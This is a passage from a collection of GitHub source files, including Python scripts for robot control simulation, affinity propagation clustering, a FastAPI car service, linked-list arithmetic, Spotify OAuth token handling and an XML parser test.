reflectivity\n backward: if True use backward model (see the module documentation)\n\n Returns:\n\n \"\"\"\n assert (r <= 1)\n assert (r >= 0)\n matrix = np.zeros((2, 2), dtype=complex)\n if not backward:\n matrix[0, 0] = 1 - 2 * r\n matrix[0, 1] = r\n matrix[1, 0] = -r\n matrix[1, 1] = 1\n matrix = matrix / (1 - r)\n else:\n matrix[0, 0] = 1 - r\n matrix[0, 1] = r\n matrix[1, 0] = r\n matrix[1, 1] = 1 - r\n return matrix\n\n\ndef swap_waves(matrix, forward_wave, backward_wave):\n incoming = np.array([forward_wave.s, backward_wave.s])\n outgoing = np.einsum('ijk,jk->ik', matrix, incoming)\n return forward_wave, w.PlanarWave(outgoing[1])\n","repo_name":"micha7a/femto-lippmann","sub_path":"propagation.py","file_name":"propagation.py","file_ext":"py","file_size_in_byte":4929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"74128358268","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\ndir = [[-1,0],[1,0],[0,1],[0,-1]]\r\ndef outrange(i,j,s,d):\r\n\r\n dx, dy = dir[d-1]\r\n if d == 1 or d == 2:\r\n s = s % ((R-1)*2)\r\n elif d == 3 or d == 4:\r\n s = s % ((C-1)*2)\r\n while True:\r\n if -1 < i+dx*s < R and -1 < j+dy*s < C:\r\n return (i+dx*s, j+dy*s, d)\r\n\r\n if d == 1:\r\n s -= i # 가장 위로 만들어주고\r\n dx, dy = 1, 0 # 방향 바꿔버리기\r\n i = 0\r\n d = 2\r\n\r\n elif d == 2: # 가장 아래로 만들어주고\r\n s -= (R-1-i) \r\n dx, dy = -1, 0\r\n i = R-1\r\n d = 1\r\n elif d == 3: # 가장 오른쪽으로 만들고\r\n s -= (C-1-j)\r\n dx, dy = 0, -1\r\n j = C -1\r\n d = 4\r\n elif d == 4: # 가장 왼쪽\r\n s -= j\r\n dx, dy = 0, 1\r\n j = 0\r\n d = 3\r\n\r\n\r\n\r\nR, C, M = map(int,input().split())\r\nboard = [[0]*C for _ in range(R)]\r\n\r\nfor _ in range(M):\r\n r,c,s,d,z = map(int,input().split())\r\n board[r-1][c-1] = [s,d,z]\r\n\r\nresult = 0\r\nfor j in range(C):\r\n for i in range(R):\r\n if board[i][j] != 0:\r\n result += board[i][j][2]\r\n board[i][j] = 0\r\n break\r\n\r\n new_board= [[0]*C for _ in range(R)]\r\n for i in range(R):\r\n for j in range(C):\r\n if board[i][j] != 0: \r\n s = board[i][j][0]\r\n nx, ny, d = outrange(i,j,s,board[i][j][1])\r\n if new_board[nx][ny] == 0:\r\n new_board[nx][ny] = [board[i][j][0],d,board[i][j][2]]\r\n\r\n else:\r\n if new_board[nx][ny][2] < board[i][j][2]:\r\n new_board[nx][ny] = [board[i][j][0],d,board[i][j][2]]\r\n \r\n board = [item[:] for item in new_board] \r\n\r\n\r\nprint(result)","repo_name":"Dayeon1351/TIL","sub_path":"BAEKJOON/17143.py","file_name":"17143.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"25265533308","text":"# add dependancies\nimport csv\nimport os\n\n# Assign a variable to to load a file from our path\nfile_to_load = os.path.join(\"Resources\" , \"election_results.csv\")\n\n#assign a variable to save the file to a path\nfile_to_save = os.path.join(\"analysis\" , \"election_analysis.txt\")\n\n# Open the election results and read the file\nwith open(file_to_load) as election_data:\n # To do analysis with the data\n # To print each row in the csv file\n # for row in file_reader:\n # print(row)\n# To print first item from each row\n# for row in file_reader:\n # print(row[0])\n# To print the header row\n # Read the file object with the reader function\n file_reader = csv.reader(election_data)\n headers = next(file_reader)\n print(headers) \n\n","repo_name":"Malvi1497/Election_analysis","sub_path":"PyPoll.py","file_name":"PyPoll.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"857465917","text":"from typing import Any\n\nfrom fastapi import FastAPI, HTTPException, Query\n\nfrom seez.domain.commands.add_car import AddCar\nfrom seez.domain.commands.get_cars_paged import GetCarsPaged\nfrom seez.domain.commands.get_makes import GetAllMakes\nfrom seez.domain.commands.get_models import GetAllModels\nfrom seez.domain.commands.get_submodels import GetAllSubModels\nfrom seez.domain.dto import AddCarDTO\nfrom seez.domain.exceptions import MakeDoesNotExist\n\napp = FastAPI()\n\n\n@app.get(\"/car/\")\ndef list_cars(\n page_number: int = Query(1, title=\"Page number\", ge=1),\n page_size: int = Query(20, title=\"Page number\", ge=1),\n price_min: int = Query(None, title=\"Price min\", ge=0),\n price_max: int = Query(None, title=\"Price min\", ge=0),\n mileage_min: int = Query(None, title=\"Price min\", ge=0),\n mileage_max: int = Query(None, title=\"Price min\", ge=0),\n) -> Any:\n return GetCarsPaged(\n page_number=page_number,\n page_size=page_size,\n price_min=price_min,\n price_max=price_max,\n mileage_min=mileage_min,\n mileage_max=mileage_max,\n ).handle()\n\n\n@app.post(\"/car/\")\ndef add_car(add_car: AddCarDTO) -> None:\n try:\n AddCar(add_car_dto=add_car).handle()\n except MakeDoesNotExist:\n raise HTTPException(status_code=400, detail=\"This Make does not exist\")\n\n\n@app.get(\"/make/\")\ndef list_makes() -> Any:\n return GetAllMakes().handle()\n\n\n@app.get(\"/model/\")\ndef list_models() -> Any:\n return GetAllModels().handle()\n\n\n@app.get(\"/submodel/\")\ndef list_submodels() -> Any:\n return GetAllSubModels().handle()\n","repo_name":"kbudaj/seez","sub_path":"seez/api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27259598070","text":"\"\"\"We are the captains of our ships, and we stay 'till the end. We see our stories through.\"\"\"\n\"\"\"Method-1- LL is modified.\"\"\"\n\nclass ListNode:\n\n def __init__(self, val):\n self.val = val\n self.next = None\n\nclass LinkedList:\n\n def __init__(self):\n self.head = None\n\n def push(self, val):\n new_node = ListNode(val)\n if not self.head:\n self.head = new_node\n return\n mover = self.head\n while mover.next:\n mover = mover.next\n mover.next = new_node\n \n def reverse(self, head):\n prev_node = next_node = None\n curr_node = head\n while curr_node:\n next_node = curr_node.next\n curr_node.next = prev_node\n prev_node = curr_node\n curr_node = next_node\n new_head = prev_node\n return new_head\n \n def add_two_numbers(self, head_1, head_2):\n rev_mover_1 = self.reverse(head_1)\n rev_mover_2 = self.reverse(head_2)\n result_head = result_mover = None\n carry = 0\n while rev_mover_1 and rev_mover_2:\n summ = (rev_mover_1.val + rev_mover_2.val + carry) % 10\n sum_node = ListNode(summ)\n carry = (rev_mover_1.val + rev_mover_2.val + carry) // 10\n if not result_head:\n result_head = result_mover = sum_node\n rev_mover_1 = rev_mover_1.next\n rev_mover_2 = rev_mover_2.next\n continue\n result_mover.next = sum_node\n result_mover = result_mover.next\n rev_mover_1 = rev_mover_1.next\n rev_mover_2 = rev_mover_2.next\n \n result_mover, carry = self.handle_longer_list(result_mover, rev_mover_1, carry)\n result_mover, carry = self.handle_longer_list(result_mover, rev_mover_2, carry)\n\n if carry:\n result_mover.next = ListNode(1)\n result_head = self.reverse(result_head)\n return result_head\n \n def handle_longer_list(self, result_mover, rev_mover, carry):\n while rev_mover:\n sum_node = ListNode((rev_mover.val + carry) % 10)\n carry = (rev_mover.val + carry) // 10\n result_mover.next = sum_node\n result_mover = result_mover.next\n rev_mover = rev_mover.next\n return (result_mover, carry)\n \n def print_list(self, head):\n mover = head\n while mover:\n print(mover.val, end=\" \")\n mover = mover.next\n print()\n\nif __name__ == \"__main__\":\n l1 = LinkedList()\n l1.push(1)\n l1.push(2)\n l1.push(3)\n l2 = LinkedList()\n l2.push(4)\n l2.push(5)\n result_head = l1.add_two_numbers(l1.head, l2.head)\n l1.print_list(result_head)","repo_name":"asperaa/back_to_grind","sub_path":"Linked_List/add_two_num_2.py","file_name":"add_two_num_2.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"30167665566","text":"import numpy as np\nfrom robot import FD, animate_robot, plt, gr, J, ID\n\n\"\"\"\n\nThis script demonstrates how a robot controller responds when an\nexternal force is applied at the end-effector. The controller attempts\nto maintain the initial robot position, and at the 200th iteration, an\nexternal force is temporarily applied for a short amount of time.\n\n\"\"\"\n\ndef main():\n\n n = 1000 # number of steps\n dt = 0.01 # time step\n\n theta10, theta20 = np.deg2rad([45, 90]) # initial robot configuration\n\n Theta1 = np.zeros(n)\n Theta2 = np.zeros(n)\n Theta1[0] = theta10\n Theta2[0] = theta20\n\n dTheta1 = np.zeros(n)\n dTheta2 = np.zeros(n)\n\n ddTheta1 = np.zeros(n)\n ddTheta2 = np.zeros(n)\n\n Fext = np.array([30, 0]) # external contact force at end-effector\n i_start = 200 # iteration that the external contact force is applied from\n i_end = 250 # iteration that the external contact force is applied till\n\n def tau_ctrl(theta1, theta2, dtheta1, dtheta2):\n \"\"\"Control (computed torque control) - move robot to goal\"\"\"\n K = 100 # stiffness gain\n D = 10 # damping gain\n return ID(theta10, theta20, 0, 0, K*(theta10 - theta1) - D*dtheta1, K*(theta20 - theta2) - D*dtheta2)\n\n for i in range(n-1):\n\n tau1, tau2 = tau_ctrl(Theta1[i], Theta2[i], dTheta1[i], dTheta2[i])\n\n if i_start < i < i_end:\n # apply external contact force at end-effector\n tau_ext = J(Theta1[i], Theta2[i]).T@Fext\n tau1 += tau_ext[0]\n tau2 += tau_ext[1]\n\n ddtheta1, ddtheta2 = FD(Theta1[i], Theta2[i], dTheta1[i], dTheta2[i], tau1, tau2)\n\n ddTheta1[i+1] = ddtheta1\n ddTheta1[i+1] = ddtheta2\n\n dTheta1[i+1] = dTheta1[i] + dt*ddtheta1\n dTheta2[i+1] = dTheta2[i] + dt*ddtheta2\n\n Theta1[i+1] = Theta1[i] + dt*dTheta1[i]\n Theta2[i+1] = Theta2[i] + dt*dTheta2[i]\n\n fig, ax = plt.subplots(tight_layout=True)\n animate_robot(fig, ax, Theta1, Theta2, interval=dt*1000)\n\n plt.show()\n\nif __name__ == '__main__':\n main()\n","repo_name":"cmower/two_dof_robot","sub_path":"contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8412903933","text":"arr = [4,3,2,1]\nn = len(arr)\n\ndef quicksort(arr, start, end):\n if start < end:\n pivot_pos = partition(arr, start, end)\n\n quicksort(arr, start, pivot_pos-1)\n quicksort(arr, pivot_pos+1, end)\n\ndef partition(arr, start, end):\n pivot = arr[end]\n i = start - 1\n\n for j in range(start, end):\n if arr[j] <= pivot:\n i += 1\n arr[i], arr[j] = arr[j], arr[i]\n arr[end], arr[i+1] = arr[i+1], arr[end] \n return i + 1\n\nquicksort(arr, 0, n-1)\nprint(arr)\n\n# tbh i dodnt understand the fucking code that much but by wt i understand is that\n# it hv a pivot elmenent as the right most one and try to arrange the lish such that\n# element lesser than pivot are toward the right and vice versa. then it find the sort\n# for the right side and left side respectively","repo_name":"Tanat04/data-structure-algorithm","sub_path":"ClassWork/practice/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31513007244","text":"import requests\n\nimport constants\n\n\ndef exchange_auth_token_for_refresh_token(auth_token):\n response = requests.post(\n \"https://accounts.spotify.com/api/token\",\n data={\n \"code\": auth_token,\n \"redirect_uri\": constants.REDIRECT_URI,\n \"grant_type\": \"authorization_code\",\n \"client_id\": constants.CLIENT_ID,\n \"client_secret\": constants.CLIENT_SECRET,\n },\n )\n return response.json()[\"refresh_token\"]\n\n\ndef get_access_token(refresh_token):\n response = requests.post(\n \"https://accounts.spotify.com/api/token\",\n data={\n \"refresh_token\": refresh_token,\n \"grant_type\": \"refresh_token\",\n \"client_id\": constants.CLIENT_ID,\n \"client_secret\": constants.CLIENT_SECRET,\n },\n )\n if not response.ok:\n raise RuntimeError(\"Could not obtain token: \", response.content)\n return response.json()[\"access_token\"]","repo_name":"rjshearme/spotify_recently_added_playlist","sub_path":"tokens.py","file_name":"tokens.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43969216286","text":"#!/usr/bin/env python\nimport argparse\nimport logging\nfrom Bio import SeqIO, Seq\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef codon_stats(fasta_file, **kwargs):\n records = list(SeqIO.parse(fasta_file, \"fasta\"))\n\n codons = {}\n\n for b1 in (\"A\", \"C\", \"T\", \"G\"):\n for b2 in (\"A\", \"C\", \"T\", \"G\"):\n for b3 in (\"A\", \"C\", \"T\", \"G\"):\n codons[b1 + b2 + b3] = str(Seq.Seq(b1 + b2 + b3).translate(table=1))\n\n tn_table_keys = sorted(codons.keys())\n\n header = [\"#ID\", \"Length\"] + [\"%s (%s)\" % (x, codons[x]) for x in tn_table_keys]\n yield header\n\n for record in records:\n seq = str(record.seq)\n codon_counts = {}\n\n for tri_nt in [seq[i : i + 3] for i in range(0, len(seq), 3)]:\n try:\n codon_counts[tri_nt] += 1\n except:\n codon_counts[tri_nt] = 1\n\n row = [record.id, len(record.seq)]\n numbers = []\n for tri_nt in tn_table_keys:\n if tri_nt in codon_counts:\n numbers.append(codon_counts[tri_nt])\n else:\n numbers.append(0)\n\n numbers = [float(x) / sum(numbers) for x in numbers]\n yield row + numbers\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Calculate AA frequencies in sequences\"\n )\n parser.add_argument(\"fasta_file\", type=argparse.FileType(\"r\"), help=\"Fasta file\")\n parser.add_argument(\"--version\", action=\"version\", version=\"0.1\")\n args = parser.parse_args()\n\n for row in codon_stats(**vars(args)):\n print(\"\\t\".join(map(str, row)))\n","repo_name":"TAMU-CPT/galaxy-tools","sub_path":"tools/fasta/fasta_codonstats.py","file_name":"fasta_codonstats.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"33305106764","text":"################################################################################\n######################### 10X -- AFFINITY PROPAGATION #########################\n################################################################################\n\n\"\"\"\nScripts for affinity propagation clustering based on sklearn-implementation.\n\"\"\"\n\n################################################################################\n################################ DEPENDENCIES ##################################\n################################################################################\n\nimport random, itertools\nfrom collections import Counter\nimport numpy as np\nimport pandas as pd\nfrom scipy.spatial.distance import pdist\nimport scipy.cluster.hierarchy as sch\nfrom sklearn.cluster import AffinityPropagation\nfrom fastcluster import linkage\nfrom polo import optimal_leaf_ordering\n\n################################################################################\n################################# MISC FUNCTIONS ###############################\n################################################################################\n\ndef return_unique(groups, drop_zero = False):\n \"\"\"\n Returns unique instances from a list (e.g. an AP cluster Series) in order \n of appearance.\n \"\"\"\n unique = []\n \n for element in groups.values:\n if element not in unique:\n unique.append(element)\n \n if drop_zero == True:\n unique.remove(0)\n \n return unique\n\n################################################################################\n################################# CLUSTERING ###################################\n################################################################################\n\ndef AP_clustering_v4P(aff_mat, axis, preference, damping, **kwargs):\n \n \"\"\"\n Defines clusters along either axis of the expression matrix using the affinity propagation algorithm \n (Frey and Dueck, Science 2007). The scikit-learn implementation is used for AP clustering.\n \n -----\n \n aff_mat[pd.DataFrame]: precomputed affinity matrix of samples or genes.\n \n axis[int]: 0 (cells) or 1 (genes)\n \n preference[float]: AP preference parameter. If preference == None, the median affinity is used as preference.\n \n damping[float]: AP damping parameter. Must be between 0.5 and 1.0.\n \n * and additional function arguments are specified in \n http://scikit-learn.org/stable/modules/generated/sklearn.cluster.AffinityPropagation.html#sklearn.cluster.AffinityPropagation\n -----\n returns: pd.Series containing axis indices (cell or gene names) with associated cluster number.\n \"\"\"\n \n ########################################\n \n def affinity_propagation(data, axis, preference, damping, **kwargs):\n \n \"\"\"\n Helper around sklearn AffinityPropagation function.\n \"\"\"\n\n af = AffinityPropagation(damping=damping, preference=preference, affinity='precomputed', **kwargs)\n\n if axis == 0:\n af.fit(data.T)\n elif axis == 1:\n af.fit(data)\n\n return af\n\n ########################################\n \n ### get and label AP output\n \n af = affinity_propagation(aff_mat, axis, preference, damping, **kwargs) \n \n labels = pd.Series(af.labels_, index = aff_mat.index)\n \n return labels.sort_values()\n\n################################################################################\n\ndef eucl_2d(data):\n\n \"\"\"\n Return pd.DataFrame of pairwaise euclidean distance of pd.DataFrame (colums)\n \"\"\"\n \n return pd.DataFrame(squareform(pdist(data, 'euclidean')), index = data.index, columns = data.index)\n\n################################################################################\n\ndef smooth_clustering(dist, cluster, k, p):\n\n \"\"\"\n Simple function to reassign cell identity of cluster-outliers based on nearest neighbors in 2d-embedding (UMAP) space.\n ----------\n dist: pd.DataFrame of pairwise m x m cell distances in 2d-space.\n cluster: pd.Series containing cluster identity for m cells.\n k: k nearest neighbors to be considered.\n p: threshold for outlier specification. A cell is considered an outlier if less than p of its k nearest neighbors in [dist] \n space are assigned to the same cluster.\n ----------\n returns reordered pd.Series object with reassigned cluster identity.\n \"\"\"\n \n #get k-nearest neighbors of all cells in 2d-embedding space\n \n kNN = {c:dist.loc[c].sort_values()[1:k+1].index for c in cluster.index}\n \n #find cells with less than p nearest neighbors of the same cluster and reassign them to cluster with most \n #nearest neighbors\n \n cnt = 0\n cluster_new = cluster.copy()\n \n for c in cluster.index:\n cl_c = cluster[c]\n cl_NN = Counter(cluster[kNN[c]])\n if cl_NN[cl_c] <= p:\n cluster_new[c] = cl_NN.most_common()[0][0]\n cnt += 1\n \n print('%s/%s cells reassigned!' % (cnt, len(cluster)))\n return AP_groups_reorder_v2(cluster_new, return_unique(cluster))\n\n################################################################################\n############################ PARAMETER SELECTION ###############################\n################################################################################\n\ndef AP_param_sel_v4P(data, aff_mat, axis, r_preference, r_damping, dview, criterion='BIC', **kwargs):\n \n \"\"\"\n Calculates the cluster numbers and information criterion values (AIC or BIC) for affinity propagation clustering \n in the specified range of preference and damping values.\n -----\n data[pd.DataFrame]: DataFrame of m samples x n genes.\n aff_mat[pd.DataFrame]: precomputed affinity matrix of samples or genes.\n axis[int]: 0 (cells) or 1 (genes)\n r_preference[list]: list specififying range of preference values to test.\n r_damping[list]: list specififying range of damping values to test.\n view: name of Ipython DirectView Instance for parallel computing.\n criterion[str]: 'AIC' or 'BIC'. Default = 'BIC'.\n -----\n returns pd.DataFrames containing IC values (IC) and number of groups (Ng) for preference / damping pairs.\n \"\"\"\n \n #initialize output\n \n output_IC = pd.DataFrame(columns = r_preference, index = r_damping)\n output_N = pd.DataFrame(columns = r_preference, index = r_damping)\n \n #define preference and damping parameters\n \n pref, damp = zip(*[x for x in itertools.product(r_preference, r_damping)])\n \n l_map = len(pref)\n \n #do AP clustering in parallel\n \n ap = dview.map_sync(AP_clustering_v4P, \n [aff_mat] * l_map, \n [axis] * l_map,\n pref, \n damp)\n \n #calculate IC value\n \n ic = dview.map_sync(calculateIC_v2P,\n [data] * l_map, \n ap,\n [axis] * l_map,\n [criterion] * l_map)\n \n #update output DataFrames\n \n for P, D, A, I in zip(pref, damp, ap, ic):\n \n output_IC.ix[D, P] = I\n output_N.ix[D, P] = len(set(A))\n \n print(output_N)\n print(output_IC)\n print(AP_IC_findmin_v1(output_IC))\n \n################################################################################\n\ndef calculateIC_v2P(data, groups, axis, criterion):\n \n \"\"\"\n Calculates the Aikike (AIC) or Bayesian information criterion (BIC) using a formula described in\n http://en.wikipedia.org/wiki/Bayesian_information_criterion\n -----\n data[pd.DataFrame]: DataFrame of m samples x n genes.\n groups[pd.Series]: Series containing group identity (int) for each sample or gene in dataframe.\n axis: 0 for samples, 1 for genes.\n criterion: 'AIC' or 'BIC'.\n \"\"\"\n \n #for parallel processing, import modules and helper functions to engine namespace\n\n \n # main formula: BIC = N * ln (Vc) + K * ln (N)\n # main formula: AIC = 2 * N * ln(Vc) + 2 * K\n # Vc = error variance\n # n = number of data points\n # k = number of free parameters\n try:\n if axis == 0:\n\n X = data\n\n elif axis == 1:\n\n X = data.T\n\n Y = groups\n\n N = len(X.columns)\n\n K = len(set(Y))\n\n #1. Compute pd.Series Kl containing cluster lengths\n\n Kl = pd.Series(index = set(Y))\n Kl_dict = Counter(Y)\n\n for cluster in set(Y):\n Kl[cluster] = Kl_dict[cluster]\n\n #2. Compute pd.DataFrame Vc containing variances by cluster\n\n Vc = pd.DataFrame(index = X.index, columns = set(Y))\n\n for cluster in set(Y):\n\n tmp_ix = Y[Y == cluster].index\n tmp_X_var = X[tmp_ix].var(axis = 1) + 0.05 #to avoid -inf values\n Vc[cluster] = tmp_X_var\n\n #3. Calculate the mean variance for each cluster\n\n Vc = Vc.mean(axis = 0)\n\n #4. Calculate the ln of the mean variance\n\n Vc = np.log(Vc)\n\n #5. Multiply Vc by group size Kl\n\n Vc = Vc * Kl\n\n #6. Calculate accumulative error variance\n\n Vc = Vc.sum()\n\n #7a. Calculate BIC\n\n BIC = Vc + K * np.log(N)\n\n #7b. Calculate AIC\n\n AIC = 2 * Vc + 2 * K\n\n #8. Return AIC or BIC value\n\n\n if criterion == 'BIC':\n\n return BIC\n\n if criterion == 'AIC':\n\n return AIC\n \n except: return None\n \n################################################################################\n \ndef AP_IC_findmin_v1(data):\n \n from operator import itemgetter\n \n to_dict = {}\n \n for r in data.index:\n for c in data.columns:\n to_dict[c,r] = data.loc[r,c]\n \n return sorted(to_dict.items(), key=itemgetter(1))[0][0]\n \n################################################################################\n############################# CLUSTER PROCESSING ################################\n################################################################################\n\ndef AP_invert_index(group_file, group):\n \n \"\"\"\n Inverts indices of a group in file of cluster groups.\n ----------\n group_file: pd.Series with ordered cluster identity of m cells or n genes.\n group: ID (int) of group to be inverted.\n ----------\n returns group file with inverted groups.\n \"\"\"\n \n ix_new = []\n \n for gr_tmp in return_unique(group_file):\n \n if gr_tmp == group:\n \n ix_tmp = list(group_file[group_file == gr_tmp].index)[::-1]\n \n else:\n \n ix_tmp = list(group_file[group_file == gr_tmp].index)\n \n ix_new += ix_tmp\n \n group_file_new = group_file[ix_new]\n \n return group_file_new\n\n################################################################################\n\ndef AP_order_incluster(dist, clusters, method = 'single', metric = 'correlation'):\n \n ordered = []\n \n #iterate over clusters\n \n for cl in return_unique(clusters):\n \n c_sel = clusters[clusters==cl].index\n D = pdist(dist.loc[c_sel, c_sel])\n Z = linkage(D, method = method)\n optimal_Z = optimal_leaf_ordering(Z, D)\n leaves = sch.dendrogram(optimal_Z, no_plot = True)['leaves']\n ordered += list(c_sel[leaves])\n \n return clusters[ordered]\n \n################################################################################\n \ndef AP_groups_reorder_v2(groups, order, link_to = None):\n \n \"\"\"\n Reorders the groups in an sample or gene group Series either completely or partially\n -----\n groups: pd.Series of either samples (Cell ID) or gene (gene ID) linked to groups (int)\n order: list containing either complete or partial new order of groups\n link_to: defines which group position is retained when groups are reorded partially; default == None, groups are linked to\n first group in 'order'\n -----\n returns reordered group Series\n \"\"\"\n \n # (1) Define new group order\n \n if set(order) == set(groups):\n order_new = order\n \n else:\n \n order_new = return_unique(groups, drop_zero = False)\n \n if link_to in order:\n link = link_to\n \n elif link_to not in order or link_to == None:\n link = order[0]\n \n order.remove(link)\n \n for group in order:\n \n order_new.remove(group)\n ins_ix = order_new.index(link) + 1\n gr_ix = order.index(group)\n order_new.insert(ins_ix + gr_ix, group)\n \n # (2) Reorder groups\n \n groups_new = pd.Series()\n \n for group in order_new:\n \n groups_new = groups_new.append(groups[groups == group])\n \n groups_new = groups_new\n \n return groups_new\n \n\n################################################################################\n################################################################################\n################################################################################\n################################################################################\n################################################################################\n################################################################################\n################################################################################","repo_name":"kasperlab/Joost_et_al_2020_Cell_Stem_Cell","sub_path":"Skin10X_affinity_propagation_v1_4.py","file_name":"Skin10X_affinity_propagation_v1_4.py","file_ext":"py","file_size_in_byte":13438,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"34993321125","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom pdb import set_trace as bp\nsns.set(style='whitegrid')\nsns.set_palette(sns.color_palette(\"muted\"))\nsns.despine()\n\ndef plot_stuff(name, df, log=False):\n plt.clf()\n xaxis = df.index\n fig, ax = plt.subplots()\n # ax.plot(xaxis, df['bst_insert'], 'o', alpha=0.8, label='bst_insert')\n ax.plot(xaxis, df['avl_insert'], 'o', alpha=0.8, label='avl_insert')\n ax.plot(xaxis, df['rb_insert'], 'o', alpha=0.8, label='rb_insert')\n if log:\n plt.yscale('log')\n name += ' (log)'\n fig.suptitle(name, fontsize=22)\n ax.legend(loc='best', fontsize='large', frameon=True)\n plt.savefig('img/'+name+'_insert.png', bbox_inches='tight', dpi=300)\n plt.clf()\n\n\n fig, ax = plt.subplots()\n fig.suptitle(name, fontsize=22)\n # ax.plot(xaxis, df['bst_search'], 'o', alpha=0.8, label='bst_search')\n ax.plot(xaxis, df['avl_search'], 'o', alpha=0.8, label='avl_search')\n ax.plot(xaxis, df['rb_search'], 'o', alpha=0.8, label='rb_search')\n if log: plt.yscale('log')\n ax.legend(loc='best', fontsize='large', frameon=True)\n plt.savefig('img/'+name+'_search.png', bbox_inches='tight', dpi=300)\n plt.clf()\n\n fig, ax = plt.subplots()\n fig.suptitle(name, fontsize=22)\n ax.plot(xaxis, df['bst_height'], 'o', alpha=0.8, label='bst_height')\n ax.plot(xaxis, df['avl_height'], 'o', alpha=0.8, label='avl_height')\n ax.plot(xaxis, df['rb_height'], 'o', alpha=0.8, label='rb_height')\n if log: plt.yscale('log')\n fig.suptitle(name, fontsize=22)\n ax.legend(loc='best', fontsize='large', frameon=True)\n plt.savefig('img/'+name+'_height.png', bbox_inches='tight', dpi=300)\n plt.clf()\n\ndef plot_height(df):\n fig, ax = plt.subplots()\n xaxis = df.index\n ax.plot(xaxis, df['avl_height'], '-', alpha=0.8, label='avl_height', lw=4)\n ax.plot(xaxis, df['rb_height'], '-', alpha=0.8, label='rb_height', lw=4)\n fig.suptitle('Worst case heights', fontsize=22)\n ax.legend(loc='best', fontsize='large', frameon=True)\n plt.savefig('img/worst_heights.png', bbox_inches='tight', dpi=300)\n plt.clf()\n\n\n# df = pd.DataFrame.from_csv(\"tree_performance.csv\",sep=',')\n# plot_stuff('Average case', df)\n\ndf = pd.DataFrame.from_csv(\"tree_performance_worst.csv\",sep=',')\nplot_stuff('Worst case', df)\n# plot_stuff('Worst case', df, True)\nplot_height(df)\n","repo_name":"lbrito1/cstuff","sub_path":"benchmark/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"6"} +{"seq_id":"74005468669","text":"from txml import XmlParser\nfrom xml.etree.ElementTree import fromstring\nimport unittest\n\n\nclass TestXmlParser(unittest.TestCase):\n\n def setUp(self):\n self.parser = XmlParser(source='sample.xml')\n self.str_source = \"\\\n ACLS5test.CEE\\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n \\\n hoi]]>\\\n \\\n \"\n\n def tearDown(self):\n del self.parser\n\n def test_get_encoding(self):\n self.encoded_parser = XmlParser(source='jan96down.xml')\n control_encoding = 'iso-8859-1'\n test_encoding = self.encoded_parser.encoding\n self.assertEqual(test_encoding, control_encoding)\n\n control_encoding = 'UTF-8'\n test_encoding = self.parser.encoding\n self.assertEqual(test_encoding, control_encoding)\n\n def test_source_check(self):\n non_existant_xml = 'some_random_file.xml'\n test_parser = XmlParser(source=non_existant_xml)\n self.assertEqual(test_parser.proces_file, False)\n self.assertEqual(test_parser.use_io, False)\n\n existing_xml = 'sample.xml'\n test_parser = XmlParser(source=existing_xml)\n self.assertEqual(test_parser.proces_file, True)\n self.assertEqual(test_parser.use_io, False)\n\n bad_format_str = \"Just some random string of words\"\n test_parser = XmlParser(source=bad_format_str)\n self.assertEqual(test_parser.proces_file, False)\n self.assertEqual(test_parser.use_io, False)\n\n proper_format_str = self.str_source\n test_parser = XmlParser(source=proper_format_str)\n self.assertEqual(test_parser.proces_file, True)\n self.assertEqual(test_parser.use_io, True)\n\n def test_node_to_dict(self):\n\n test_node = fromstring(self.str_source)\n my_parser = XmlParser()\n if hasattr(test_node, 'getroot'):\n test_node = test_node.getroot()\n test_dict = my_parser._node_to_dict(test_node)\n control_dict = {'path': 'export/level4/NL/30114.xml',\n 'Product_ID': '30114', 'Updated': '20150301102709',\n 'Quality': 'AWESOME', 'Supplier_id': '5',\n 'Prod_ID': 'FLY-734CU', 'Catid': '587',\n 'On_Market': '1',\n 'Model_Name': 'Mibatsu Monstrosity',\n 'Product_View': '32767',\n 'HighPic': 'http://images.awesome.biz/img/high/30114-Mibatsu.jpg',\n 'HighPicSize': '20782', 'HighPicWidth': '320',\n 'HighPicHeight': '300', 'Date_Added': '20050715000000',\n 'text': ' ',\n 'tag': \"file\"}\n self.assertDictEqual(test_dict, control_dict)\n\n def test_get_namespaces(self):\n encoded_parser = XmlParser(source='jan96down.xml')\n # encoded_parser._get_namespaces()\n test_dict = encoded_parser.namespaces\n t_key = list(test_dict.keys())[0]\n ts_list = test_dict[t_key]\n ts_list.sort()\n test_dict = {t_key: ts_list}\n control_list = ['Application', 'ParaCurve', 'Metric', 'Start',\n 'Cant', 'Feature', 'Curve', 'CoordGeom',\n 'Alignments', 'Property', 'LandXML', 'CantStation',\n 'Profile', 'End', 'Center', 'Project', 'PVI', 'Units',\n 'Spiral', 'ProfAlign', 'Alignment', 'PI', 'Line']\n control_list.sort()\n control_dict = 